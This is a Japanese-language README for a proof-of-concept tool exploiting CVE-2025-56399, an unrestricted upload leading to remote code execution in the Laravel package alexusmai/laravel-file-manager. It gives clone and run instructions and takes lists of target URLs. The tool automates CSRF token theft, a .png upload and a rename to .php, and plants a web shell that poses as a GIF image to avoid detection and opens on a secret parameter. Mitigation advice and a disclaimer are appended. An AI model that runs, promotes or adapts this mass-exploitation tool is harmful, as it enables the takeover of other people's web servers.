
CVE-2025-56399のPoC - alexusmai/laravel-file-manager (≤3.3.1)における無制限ファイルアップロードによるRCE。検出、CSRF抽出、およびファイルアップロードを自動化します。
CWE-434: 危険なタイプのファイルの無制限アップロード
CVSS スコア: 8.5 (高)
このツールは、alexusmai/laravel-file-manager (バージョン 3.3.1 以下) の重大な脆弱性 CVE-2025-56399 の Proof of Concept (PoC) を提供します。
この脆弱性により、認証された攻撃者 が細工されたファイルをアップロードし、クライアント側の検証を回避し、PHP 拡張子にリネームすることで リモートコード実行 (RCE) を達成できます。
このスクリプトは全プロセスを自動化します:
| 属性 | 値 |
|---|---|
| 脆弱性タイプ | 無制限ファイルアップロード → RCE |
| CWE | CWE-434 |
| CVSS スコア | 8.5 (高) |
| 攻撃ベクター | ネットワーク |
| 攻撃の複雑さ | 低 |
| 必要な権限 | 低 (認証済み) |
| ユーザーインタラクション | アクティブ |
/file-manager).png ファイルをアップロードする.php に変更するgit clone https://github.com/Jenderal92/laravel-filemanager-unrestricted-upload.git
cd laravel-filemanager-unrestricted-upload
pip install -r requirements.txt
必要条件
· Python 2.7 · requests · colorama
📖 使い方
python2 lfm.py list.txt
入力形式 (list.txt)
https://target1.com
https://target2.com
http://target3.com
出力
· valid.txt – 検証済みシェルURLのリスト (アクセス時は ?shinday=1 を追加)
出力例:
https://target.com/storage/shxt_123456.php?shinday=1
🧪 エクスプロイトの仕組み
<meta name="csrf-token"> または _token 入力フィールドからトークンを抽出します。📂 ペイロードの詳細
アップロードされた PHP ファイルは単一ファイルの Web シェルであり、以下の機能を持ちます:
· システム情報を表示 (php_uname) · ファイルアップロードフォームを提供 (ツール追加用) · パラメータ ?shinday=1 に応答して完全なシェルインターフェースを表示 · それ以外の場合は、検出を避けるために有効な GIF89a 画像を出力
シェルへのアクセス方法:
https://target.com/path/to/shxt_123456.php?shinday=1
🛡️ 緩和策
この脆弱性から保護するには:
Route::group(['middleware' => ['auth', 'admin']], function () {
// File Manager routes
});
composer remove alexusmai/laravel-file-manager
<FilesMatch "\.(php|phtml|php3|php4|php5|phar)$">
Deny from all
</FilesMatch>
📦 影響を受けるバージョン
| パッケージ | 影響を受けるバージョン |
|---|---|
| alexusmai/laravel-file-manager | ≤ 3.3.1 |
🔗 参考文献
· CVE-2025-56399 - NVD · GitHub Advisory · Snyk Vulnerability Database · VulDB Entry · alexusmai/laravel-file-manager
📜 免責事項
警告: このツールは教育および許可されたセキュリティテスト専用です。 使用することにより、以下に同意するものとします:
· 自分が所有するか、明示的なテスト許可を得たシステムのみテストすること · 悪意のある目的で使用しないこと · 適用されるすべての法令を遵守すること
著者は、誤用または生じた損害について一切の責任を負いません。
詳細な免責事項は Jenderal92 のカバーにあります。こちら !!! で確認できます。